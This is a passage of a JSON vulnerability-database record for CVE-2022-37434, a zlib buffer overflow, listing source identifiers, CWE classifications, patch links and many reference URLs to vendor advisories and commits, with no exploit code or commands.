"db": "PACKETSTORM",
"id": "169335"
},
{
"db": "PACKETSTORM",
"id": "169595"
},
{
"db": "PACKETSTORM",
"id": "170210"
},
{
"db": "PACKETSTORM",
"id": "169810"
},
{
"db": "PACKETSTORM",
"id": "170242"
},
{
"db": "PACKETSTORM",
"id": "169692"
},
{
"db": "PACKETSTORM",
"id": "169696"
},
{
"db": "PACKETSTORM",
"id": "169624"
},
{
"db": "PACKETSTORM",
"id": "170162"
},
{
"db": "PACKETSTORM",
"id": "178074"
},
{
"db": "PACKETSTORM",
"id": "173605"
}
],
"trust": 2.07
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-428208",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-428208"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2022-37434",
"trust": 2.3
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2022/08/05/2",
"trust": 1.2
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2022/08/09/1",
"trust": 1.1
},
{
"db": "PACKETSTORM",
"id": "169624",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "169595",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "169707",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170027",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169503",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171271",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169726",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168107",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169566",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169906",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169783",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169557",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168113",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169577",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168765",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-428208",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2022-37434",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169335",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170210",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169810",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170242",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169692",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169696",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170162",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "178074",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "173605",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-428208"
},
{
"db": "VULMON",
"id": "CVE-2022-37434"
},
{
"db": "PACKETSTORM",
"id": "169335"
},
{
"db": "PACKETSTORM",
"id": "169595"
},
{
"db": "PACKETSTORM",
"id": "170210"
},
{
"db": "PACKETSTORM",
"id": "169810"
},
{
"db": "PACKETSTORM",
"id": "170242"
},
{
"db": "PACKETSTORM",
"id": "169692"
},
{
"db": "PACKETSTORM",
"id": "169696"
},
{
"db": "PACKETSTORM",
"id": "169624"
},
{
"db": "PACKETSTORM",
"id": "170162"
},
{
"db": "PACKETSTORM",
"id": "178074"
},
{
"db": "PACKETSTORM",
"id": "173605"
},
{
"db": "NVD",
"id": "CVE-2022-37434"
}
]
},
"id": "VAR-202208-0404",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-428208"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T20:18:09.441000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Debian CVElist Bug Report Logs: zlib: CVE-2022-37434",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=f5712d783fb1fc3f3fa283bb16da0e35"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/ivd38/zlib_overflow "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-37434"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-787",
"trust": 1.1
},
{
"problemtype": "CWE-120",
"trust": 1.0
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-428208"
},
{
"db": "NVD",
"id": "CVE-2022-37434"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.3,
"url": "https://github.com/ivd38/zlib_overflow"
},
{
"trust": 1.2,
"url": "http://www.openwall.com/lists/oss-security/2022/08/05/2"
},
{
"trust": 1.2,
"url": "https://github.com/curl/curl/issues/9271"
},
{
"trust": 1.2,
"url": "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#l1062-l1063"
},
{
"trust": 1.2,
"url": "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1"
},
{
"trust": 1.2,
"url": "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#l762-l764"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/oct/37"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/oct/38"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/oct/41"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/oct/42"
},
{
"trust": 1.1,
"url": "https://www.debian.org/security/2022/dsa-5218"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/pavpqncg3xrlclnsqrm3kan5zfmvxvty/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/nmboj77a7t7pqcarmduk75te6llesz3o/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/yrqai7h4m4rqz2iwzueexecbe5d56bh2/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/x5u7otkzshy2i3zfjsr2shfhw72rkgdk/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/jwn4ve3jqr4o2sous5txnlanrpmhwv4i/"
},
{
"trust": 1.1,
"url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html"
},
{
"trust": 1.1,
"url": "http://www.openwall.com/lists/oss-security/2022/08/09/1"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20220901-0005/"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213488"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213489"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213490"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213491"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213493"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213494"
},
{
"trust": 1.0,
"url": "https://security.netapp.com/advisory/ntap-20230427-0007/"
},
{
"trust": 1.0,
"url": "https://github.com/madler/zlib/commit/1eb7682f845ac9e9bf9ae35bbfb3bad5dacbd91d"
},
{
"trust": 0.7,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2022-37434"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.7,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35527"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-35527"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35525"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-35525"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-37434"
},
{
"trust": 0.4,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-2509"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-3515"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-40674"
},
{
"trust": 0.4,
"url": "https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2016-3709"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-30293"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-27404"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-1304"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-26700"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-26719"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-42898"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-22624"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-26709"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-26717"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-22629"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-27405"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-27406"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-22662"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-3709"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-26710"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-22628"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-26716"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-29900"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-1353"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1353"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-29900"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-0494"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23816"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-23816"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2509"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2588"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0494"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-2588"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-29901"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-23825"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23825"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-34903"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-39399"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21626"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21624"
},
{
"trust": 0.2,
"url": "https://docs.openshift.com/container-platform/4.11/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21619"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21628"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21618"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30002"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1852"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1016"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1048"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0617"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-30002"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-29581"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-27950"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0168"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-28893"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1055"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22844"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0561"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0924"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0909"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-36946"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-24448"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0562"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-2639"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1355"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-2586"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36558"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3640"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0561"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21499"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0854"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-20368"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0891"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0854"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26373"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36516"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-36558"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0617"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0865"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1184"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-2938"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-2078"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-23960"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0865"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-36516"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-28390"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3640"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0562"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-25255"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0908"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0168"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-29901"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-41974"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-38177"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-38178"
},
{
"trust": 0.2,
"url": "https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25032"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1927"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1785"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1586"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1897"
},
{
"trust": 0.1,
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016710"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/zlib"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42798"
},
{
"trust": 0.1,
"url": "https://support.apple.com/kb/ht204641"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32932"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42808"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32924"
},
{
"trust": 0.1,
"url": "https://support.apple.com/en-us/ht201222."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32926"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32923"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42801"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42803"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42799"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42800"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32947"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht213491."
},
{
"trust": 0.1,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32940"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32944"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26700"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27404"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26719"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26717"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22624"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3916"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26716"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27405"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22629"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1304"
},
{
"trust": 0.1,
"url": "https://catalog.redhat.com/software/containers/registry/registry.access.redhat.com/repository/rh-sso-7/sso76-openshift-rhel8"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22628"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22662"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8964"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26709"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32149"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21626"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21628"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21619"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21624"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21618"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:7434"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0908"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html-single/install/index#installing"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3517"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0909"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0891"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41912"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:9040"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25858"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-35949"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2238"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-34903"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2238"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-31129"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html-single/install/index#installing"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-35948"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25858"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-31129"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:7276"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30321"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32742"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30322"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26945"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26945"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30322"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30323"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30321"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30323"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhba-2022:7200"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:7201"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/glsa/202210-42"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2068"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2097"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8781"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41715"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2879"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42003"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32189"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2880"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36518"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36518"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1292"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42004"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27664"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-37603"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/klibc/2.0.10-4ubuntu0.1"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-6736-1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-9840"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/klibc/2.0.13-1ubuntu0.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/klibc/2.0.7-1ubuntu5.2"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36085"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20231"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-0215"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31566"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-47629"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-1281"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3634"
},
{
"trust": 0.1,
"url": "https://registry.centos.org/v2/\":"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-31566"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:4053"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23177"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-36084"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36086"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
},
{
"trust": 0.1,
"url": "https://issues.redhat.com/):"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20232"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42012"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20838"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-18218"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42010"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3580"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-32233"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42011"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1271"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17595"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-4304"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23177"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24370"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-0361"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20231"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36084"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24407"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21235"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36087"
},
{
"trust": 0.1,
